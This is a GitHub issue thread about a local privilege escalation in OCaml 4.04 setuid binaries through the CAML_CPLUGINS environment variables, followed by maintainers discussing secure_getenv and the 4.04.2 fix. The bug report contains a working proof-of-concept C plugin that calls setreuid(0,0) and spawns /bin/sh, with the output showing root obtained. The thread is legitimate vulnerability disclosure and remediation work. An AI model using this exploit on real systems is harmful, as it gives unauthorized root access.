Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

local privilege escalation issue with ocaml binaries #7557

Closed
vicuna opened this issue Jun 15, 2017 · 62 comments
Closed

local privilege escalation issue with ocaml binaries #7557

vicuna opened this issue Jun 15, 2017 · 62 comments

Comments

@vicuna
Copy link

vicuna commented Jun 15, 2017

Original bug ID: 7557
Reporter: emilliken
Assigned to: @damiendoligez
Status: resolved (set by @damiendoligez on 2017-06-23T15:19:47Z)
Resolution: fixed
Priority: urgent
Severity: major
OS: *nix
Version: 4.04.0
Target version: 4.04.2
Fixed in version: 4.04.2
Category: runtime system and C interface
Monitored by: @gasche

Bug description

I've marked this issue as private.

By default, it seems the environment variables CAML_CPLUGINS, CAML_NATIVE_CPLUGINS, and CAML_BYTE_CPLUGINS can be used to auto-load code into any executable produced with ocamlopt or ocamlc. This can lead to privilege escalation if the binary is marked setuid.

Steps to reproduce

To demonstrate, as root, do:

cat > hello.ml << EOF

let _ =
print_endline "hello, world"
EOF

ocamlopt -o hello hello.ml

chmod +s hello

As an unprivileged user, do:

$ cat > exp.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

void caml_cplugin_init() {
printf("IN PLUGIN\n");
setreuid(0,0);
execl("/bin/sh", "sh", NULL);
}
EOF
$ gcc -shared -fPIC -o exp.so exp.c
$ id
uid=1002(user) gid=1002(user) groups=1002(user)
$ CAML_CPLUGINS=./exp.so ./hello
IN PLUGIN

id

uid=0(root) gid=1002(user) egid=0(root) groups=0(root),1002(user)

Additional information

It sounds like the fix involves making sure that the effective uid matches the real uid before loading any plugins. Code is in byterun/sys.c

File attachments

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @lefessan

Another fix would be to use "./configure --no-cplugins" when building OCaml, to completely avoid cplugins when creating setuid executables.

Maybe we could also create a "secure" runtime variant, that would disable cplugins, and maybe other features seen as security weaknesses.

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @dra27

@lefessan - just in case you were planning to, please don't push patches to GitHub at this stage.

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @dra27

@emilliken - thanks for the report, and for your sensitivity in not marking it public. Can I ask whether you've found this as a result of a security review of the code, or as part of a production system?

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @mshinwell

Leo and I looked at this a little and we suspect that checking the real and effective uids is the right solution.

I think I would be in favour of some kind of "secure" runtime variant (but shouldn't that be the default)?

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @dra27

It's certainly surprised me that this undocumented feature was enabled by default - unless you'd seen #668, I'm not clear how you'd know it was there?

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @xavierleroy

This is a serious issue indeed, many thanks for reporting it.

I think the first thing to do is to harden the existing plugin mechanism along the lines suggested by the reporter, i.e. check the effective and real user ids.

Then we should (re-)discuss whether the plugin mechanism should be on by default or off by default with a configure-time flag to activate it.

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @lpw25

It might be worth using issetugid on the systems that provide it (I think Solaris, MacOs and the BSDs). It's slightly more robust than the uid == euid check since it will still trigger even if the original program does something like setuid(0).

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @dra27

On the administrative side, I don't think we can avoid OCaml's second CVE: we need to disclose that 4.04.0 and 4.04.1 are vulnerable, and presumably we will need to release this fix as 4.04.2 or at least provide a back-port patch for 4.04.1?

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @lpw25

For reference, here is the code in glibc which effectively guards LD_PRELOAD from similar issues:

__libc_enable_secure = (__geteuid () != __getuid ()
|| __getegid () != __getgid ());

which is in elf/enbl-secure.c.

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @avsm

Using issetugid(2) is definitely recommended, when available. While checking current and real uid works to some extent, it doesn't cover the case of existing file handles that are privileged. For instance, is the C plugin code possible to trigger when linking an OCaml program as a library?

The OpenBSD implementation of issetugid is an instance of a non-uid based check; on that operating system it is a taint flag set at exec time. http://man.openbsd.org/OpenBSD-6.1/issetugid.2

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @mshinwell

@avsm I don't follow what you mean about "existing file handles that are privileged" (presumably in the case where real uid = effective uid). Can you elaborate?

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @avsm

The get[e]uid calls only return the current state of the system, and so the library cannot determine what happened previously from the calling code with respect to the uids. Therefore, the process may already have file descriptors open that would be considered privileged (i.e. they were opened with root-level access).

To cover this case, some issetugid(2) implementations such as OpenBSD "taint" the process if it was ever made setuid or setgid in any previous execve() system calls. This is not something that is easy to recreate from within a library, and hence it is better to call the function if available.

I believe that glibc/musl libc propagate the libc secure flag that lpw25 posted above, and do not do such taint tracking. Therefore we probably need to analyse what the scope of the C plugin code is -- can it be triggered when OCaml is used as a library, or is it only from within ocamlopt-generated executables before any OCaml code is called?

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: emilliken

dra - this was found after ltrace'ing my ocaml binary and tracing back some getenv calls. It was not found as part of a production system.

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @dra27

@emilliken - thanks. It doesn't lessen the seriousness, but it's useful to know that it's not yet been found being exploited!

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @xavierleroy

I don't follow what you mean about "existing file handles that are privileged" (presumably in the case where real uid = effective uid).

Perhaps something along the lines of:

  • suid-as-root program starts
  • opens a file descriptor on /etc/shadow
  • drops suid privileges (so that effective uid = real uid again)
  • loads malicious plugin
  • plugin gets access to secrets in /etc/shadow via the file descriptor.

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @damiendoligez

It seems obvious to me that we need to do the following:

  1. Implement the setuid check, preferably using issetugid when available.
  2. While we're at it, use the check to disable CAML_DEBUG_SOCKET, and
    maybe also OCAMLRUNPARAM, and look at the Lafosec documents to see
    if there are any others.
  3. Make the plug-in stuff part of a runtime variant. I don't think a
    configure-time configuration is usable in practice.
  4. For the default runtime, use the variant without plug-ins.

Of course this must all be done before I can release 4.05.0...

I'd like your opinions on the idea of making a 4.04.2 release.

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @mshinwell

I think this is serious enough that 4.04.2 would be sensible.

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @avsm

Damien, your proposal makes me significantly more comfortable with the security of the default OCaml runtime on Unix, especially 4). I'd be happy to help test 4.04.2 quickly in OPAM CI once these changes are in.

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @dra27

I agree that it's serious enough for a 4.04.2 release. We're expecting every distribution to want to patch this, so it would seem inconsistent not to have released it for that branch ourselves.

@vicuna
Copy link
Author

vicuna commented Jun 15, 2017

Comment author: @stedolan

As well as CAML_DEBUG_SOCKET and OCAMLRUNPARAM, bytecode's CAMLLIB, OCAMLLIB and CAML_LD_LIBRARY_PATH should get the same treatment. The standard library must also be hardened: it should not be possible to trick a setuid root program into creating files in, say, /etc/init.d by manipulating TMPDIR.

We should use secure_getenv instead of getenv on Linux/glibc systems, which returns NULL when running setuid, as though the env var were absent. It is not secure on Linux to do a simple UID check, because Linux allows "capabilities" to be applied to an executable which grant specific privileges but do not change UID. Several Linux distributions make an effort to install setuid-root programs without the setuid bit set, using capabilities instead.

An example of a portable secure_getenv (using issetugid on *BSD and falling back to euid == uid) appears in GnuTLS:

https://gitlab.com/gnutls/gnutls/blob/master/gl/secure_getenv.c

@vicuna
Copy link
Author

vicuna commented Jun 16, 2017

Comment author: @xavierleroy

I support implementing and using secure_getenv as suggested by @stedolan. We can easily make it available from OCaml as Sys.secure_getenv and start using it there too, e.g. in Filename.temp_file.

It seems that all security risks identified in this thread are solved with secure_getenv. Is it the case? Or do we still need a "am I running suid?" runtime function in other places?

@vicuna
Copy link
Author

vicuna commented Jun 16, 2017

Comment author: @damiendoligez

Correct me if I'm wrong, but if we use secure_getenv to implement the Sys.getenv primitive, then the standard library (and all user code) is automatically hardened, right?

Should we do that, or is it too much of an incompatibility?

What about the Unix library? Should we also change Unix.getenv? Should we add a secure_getenv primitive?

@vicuna
Copy link
Author

vicuna commented Jun 16, 2017

Comment author: @xavierleroy

If you implement Sys.getenv as secure_getenv, all environment variables read as not defined in a suid program, including innocuous ones such as USER. As much as I like "secure" to be the default, I'm afraid this is going too far.

@vicuna
Copy link
Author

vicuna commented Jun 16, 2017

Comment author: @damiendoligez

I have uploaded three commits (against 4.04) that fix the problem:

  1. turn the plug-in stuff into a runtime variant; the default runtime doesn't use plug-ins
  2. add caml_secure_getenv to the runtime and Sys.secure_getenv to the stdlib
  3. use the secure_getenv functions where appropriate

For obvious reasons, I'm not making a GitHub PR.

Lightly tested under OSX.

Please review.

@vicuna
Copy link
Author

vicuna commented Jun 16, 2017

Comment author: @damiendoligez

Update: found and fixed a bug in the autodetection of secure_getenv (new version of patch 2).

@vicuna
Copy link
Author

vicuna commented Jun 20, 2017

Comment author: @alainfrisch

A few comments:

  • For bug fix releases and 4.05, I'd propose to simply disable the plugin feature altogether.

  • Can someone comment on the extent of the security hole? Recently adding support for runtime plugins is obvious affected, but what about other environment variables interpreted by the runtime system or standard library? It seems that bytecode is more fragile than native because of CAML_LD_LIBRARY_PATH. Except for runtime plugins, is the native system affected at all?

  • I'm really not a big fan of runtime variants. Will we end up building potentially 2^n runtime systems for all combinations of such switches? When possible, I think that a link-time choice should be preferred. We need some plumbing to pass such information to the runtime system, but this should not be too difficult (this was also discussed in the context of Unicode support for the Windows runtime: Let's do it! #1200).

@vicuna
Copy link
Author

vicuna commented Jun 20, 2017

Comment author: @lefessan

If secure_getenv fixes the problem for all environment variables, including cplugins, what's the point of disabling the plugin feature ?

@vicuna
Copy link
Author

vicuna commented Jun 20, 2017

Comment author: @xavierleroy

I reviewed the 3 patches and also applied them in turn to 4.04 and tested. The patches look good and address the security issue as far as I can tell.

Very minor suggestion: the two getenv("CAMLSIGPIPE") in byterun/ should perhaps be caml_secure_getenv("CAMLSIGPIPE") either. I know it's Win32-specific code, and currently caml_secure_getenv = getenv under Win32, but maybe this will change in the future, in which case we would probably want to ignore CAMLSIGPIPE if we're running in a SUID-style context.

@vicuna
Copy link
Author

vicuna commented Jun 20, 2017

Comment author: @xavierleroy

My modest proposal:

  • For 4.04.2, for the sake of minimizing incompatibilities with earlier 4.04 releases, keep CPLUGINS active in the default runtime (no runtime variant; don't apply patch 1) but apply patches 2 and 3, thus fixing the security issue.
  • For 4.05 and later, discuss whether we want the CPLUGINS mechanism 1- active in the default runtime, 2- available as a runtime variant, or 3- completely removed from the runtime system because it's not such a great idea after all.

@vicuna
Copy link
Author

vicuna commented Jun 20, 2017

Comment author: @xavierleroy

Re "Except for runtime plugins, is the native system affected at all?": possibly via TMPDIR and Filename.open_temp_file, see @stedolan's comment #7557#c17904

@vicuna
Copy link
Author

vicuna commented Jun 21, 2017

Comment author: @stedolan

If you implement Sys.getenv as secure_getenv, all environment variables read as not defined in a suid program, including innocuous ones such as USER. As much as I like "secure" to be the default, I'm afraid this is going too far.

In fact, reading USER in a suid program is generally a security hole, since the value can be modified to impersonate another user. Suid programs should instead use Unix.getuid() to determine the current user. Similarly, suid programs should not read HOME (to avoid being tricked into writing preference files into /etc/init.d), and should instead use Unix.getpwuid.

So, I suggest making Sys.getenv be secure_getenv, but also providing Sys.getenv_untrusted (implemented as getenv is currently).

This change only affects people writing suid programs, and it seems better that such programs have to jump through some hoops to read untrusted environment variables than to introduce subtle security holes. The failures caused by suid programs ignoring environment variables by default will be easier to find and debug than the security holes cause otherwise.

@vicuna
Copy link
Author

vicuna commented Jun 21, 2017

Comment author: emilliken

Also, I noticed there is both Sys.getenv and Unix.getenv. Maybe whatever API additions are made in Sys should be mirrored to Unix?

@vicuna
Copy link
Author

vicuna commented Jun 21, 2017

Comment author: @damiendoligez

Also, I noticed there is both Sys.getenv and Unix.getenv. Maybe whatever API additions are made in Sys should be mirrored to Unix?

I noticed that, of course. Because Unix is a very thin layer over the syscalls, and the secure_getenv function is always available from Sys, I decided to leave the Unix one untouched. I'll add a pointer to Sys.secure_getenv in the doc comment for Unix.getenv.

If we follow @stedolan's advice and make the secure getenv the default, I think we'll provide the two functions in Unix as well as Sys.

@vicuna
Copy link
Author

vicuna commented Jun 21, 2017

Comment author: @dra27

I agree with @stedolan's reasoning - either as Sys.getenv_untrusted or even, as with bounds checking functions elsewhere, Sys.unsafe_getenv?

Following an offline conversation, and in keeping with the idea that Unix is a thin wrapper over syscalls, it would seem that Unix should have different functions - so Unix.getenv being equivalent to Sys.getenv_untrusted/Sys.unsafe_getenv and Unix.secure_getenv being equivalent to the new Sys.getenv. It depends whether we regard having the names in Unix corresponding to the actual name of the syscall as being more important than trying to catch out a badly-coded setuid program.

@vicuna
Copy link
Author

vicuna commented Jun 21, 2017

Comment author: @dra27

Forgive the slight "patch colour" aspect of this, but on the subject of the combinatorial explosion of runtimes (also thinking of #1200) I think we should stick to single letter suffices (ignoring the slight irritation of _pic). That way, each particular runtime "idea" has a given letter, and we can define an ordering for them. This way, for CI and standard installation, we can ignore combinations we don't care about, but if someone wants to build a debug c-plugins runtime, then the build system could be set to build ocamlrundc, etc.

The machinery for doing that is irrelevant for this patch, other than to change "plug" to, say, "c".

@vicuna
Copy link
Author

vicuna commented Jun 22, 2017

Comment author: @damiendoligez

I don't think it's a good idea to have Unix.getenv and Sys.getenv be different functions. In this case, I'd say security-by-default is more important than keeping the syscall's name.

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @damiendoligez

I've discussed with Xavier, and here is the new plan for getenv:

Sys.getenv -> secure version

Unix.getenv -> secure version
Unix.unsafe_getenv -> raw version

This will be applied to 4.04.2, 4.05, and trunk. If you don't agree with this plan, speak up now.

We still need to discuss the fate of c-plugins.

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @mshinwell

Sorry to have been absent from this discussion, I've been ill all week.

The "new plan for getenv" sounds fine for me.
As regards c-plugins, I agree with Anil.

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @alainfrisch

I won't fight for it, but my feeling is that we should aim for a minimal fix for 4.04.2, and switch to using secure_getenv for later versions. Considering that we are in feature freeze for 4.05 since February (if I recall correctly), I'd say this should go in 4.06.

There could be valid cases for passing information through environment variables even in "secure execution" mode as defined in https://linux.die.net/man/3/secure_getenv. Simply switching getenv to the secure version would thus break valid programs, and this does not seem good for 4.04.2.

The most critical problem is with CPLUGINS. Disabling them by default for 4.04.2 (with the ability to enable them as a configure-time) or using secure_getenv specifically for supporting them in the runtime system would fix the issue as well. There is also a problem with TMPDIR, but it has been around forever and seems much less critical: typically, programs would create temporary files through Unix.open_temp_file, which would not overwrite an existing file.

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @dra27

My comment on caml-devel was the wrong way round - my suggestion would be to maintain the same interface for Unix in 4.04.2, so don't add Unix.unsafe_getenv but do add the C primitive for it (so anyone who must use 4.04.2 can use it manually)

Alternatively, as Alain suggests, we could add the secure primitive to 4.04.2 and 4.05, not expose it in Sys or Unix but use it internally as for your original patch.

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @damiendoligez

@Frisch, given the way the CVE are written, I'd argue the minimal fix is the switch to secure_getenv. For the valid programs that this will break, they are rather hypothetical: they must be both setuid and written carefully enough not to have the vulnerability.

@dra good catch, I'll put the declaration of Unix.unsafe_getenv in a comment to keep the interface unchanged while somewhat documenting the new primitive.

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @lefessan

About c-plugins, one of the original reasons for them is to get rid of code that should probably not be all the time in the runtime. For example, as a proof of concept, I implemented a c-plugin for Spacetime a while ago, that provides several benefits:

  1. the code of the Spacetime runtime (2Klines of the 20Klines of asmrun/) would be outside of the distribution, it can be updated/improved without being in the coreteam, as an outside project;
  2. other memory profilers can use the same hooks in the GC, so that the runtime is not tied to a specific profiler.

Once the current security issue is solved by secure_getenv, could somebody explain the problem with c-plugins, except the traditionnal "I don't use it, so it shouldn't be there" ?

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @avsm

@doligez @dra27 - good point regarding the interface, as quite a few packages in OPAM reexport the Unix signature and could break with a new function addition.

@lefessan I asked several questions in the above thread which haven't been answered yet (0017927), so I'm not inclined to re-ask them until addressed. This bug is specifically about the security issue, so perhaps it is better to start a different one about the future of c-plugins on a fresh issue.

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @alainfrisch

For the valid programs that this will break, they are rather hypothetical: they must be both setuid and written carefully enough not to have the vulnerability.

No, being setuid (or any other case of requiring "secure execution") and relying on environment variables is enough to be broken. (i) A setuid program with the vulnerability does not necessarily lead to an actual attack vector; and (ii) using environment variables in a setuid program is not necessarily unsafe (it depends on what you do with them).

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @damiendoligez

@Frisch

using environment variables in a setuid program is not necessarily unsafe (it depends on what you do with them)

Yes but we often get surprised by the creativity of attackers.

Anyway, do we have any actual example of a setuid program written in OCaml? I'd rather be more secure and risk breaking them (if they exist).

@lefessan, @avsm
Please do open a new PR to discuss the future of c-plugins.

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @lefessan

@avsm Each solution comes with a different trade-off: ease-of-use vs performance vs portability, etc. If you are looking for portability and ease-of-use, the c-plugin mechanism is probably the best currently available for OCaml (from my experience of playing with perf and LD_PRELOAD in the past).

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @stedolan

@Frish

There is also a problem with TMPDIR, but it has been around forever and seems much less critical: typically, programs would create temporary files through Unix.open_temp_file, which would not overwrite an existing file.

No, the security hole with TMPDIR is critical. The issue is not the ability to overwrite an existing file (as you say, open_temp_file will not do this). The issue is that there are several directories on most Unix systems whose contents are habitually executed by root (among many others /etc/init.d, /etc/cron.d, /etc/bash_completion.d). If an attacker can create a file in such directories, of any filename but with attacker-controlled contents, then the attacker can execute arbitrary code as root.

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @alainfrisch

@stedolan Good point. There is still a difference between the security hole created by CPLUGINS against which the author of the program cannot do anything, and the one related to TMPDIR, for which the author can (and should anyway) explicitly choose the directory (through Filename.set_temp_dir_name or ~temp_dir) if the programs needs to create temporary files.

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @damiendoligez

This PR is now public

@vicuna vicuna closed this as completed Jun 23, 2017
@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @damiendoligez

Fixed in 4.04.2, cherry-picked to 4.05.0 and trunk.
Trunk version adds Unix.unsafe_getenv; 4.04 and 4.05 don't.

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @stedolan

@Frisch

I agree. The TMPDIR hole makes it difficult to write a secure suid program that uses Filename.open_temp_file, while the CPLUGINS hole makes it impossible to write a secure suid program at all.

@vicuna
Copy link
Author

vicuna commented Jun 23, 2017

Comment author: @gasche

Do you think that it would be possible to put some process in place that would help avoid similar issues in the future, without having too much of a bureaucracy cost?

The only simple thing that I can see right now is: make it an habit that any change that impacts the runtime system has someone thinking about security considerations before the merge decision. That is, not merge until someone explicitly wrote a comment on the PR to the effect of "I reviewed the security implication of the patch and I believe it is safe".

("impacts the runtime system" is a rather broad category. Is is broad enough? Is it too broad? I don't see an effective and simple criterion that would be better.)

(I could try to enforce this in a semi-automated way by asking the person that ticks the "security impact considered" box to add a github label, but my previous adventure with the no-changes-required label suggests that this is fragile in ways I don't completely understand. I would be interested in hearing people's thoughts about the adequate process, rather than how to automate it, first.)

@vicuna
Copy link
Author

vicuna commented Jun 24, 2017

Comment author: @xavierleroy

Let's keep this PR focused on the technical issue that is described in the CVE. Meta-discussions on how to prevent similar blunders in the future should take place elsewhere, e.g. on the Caml developers list.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants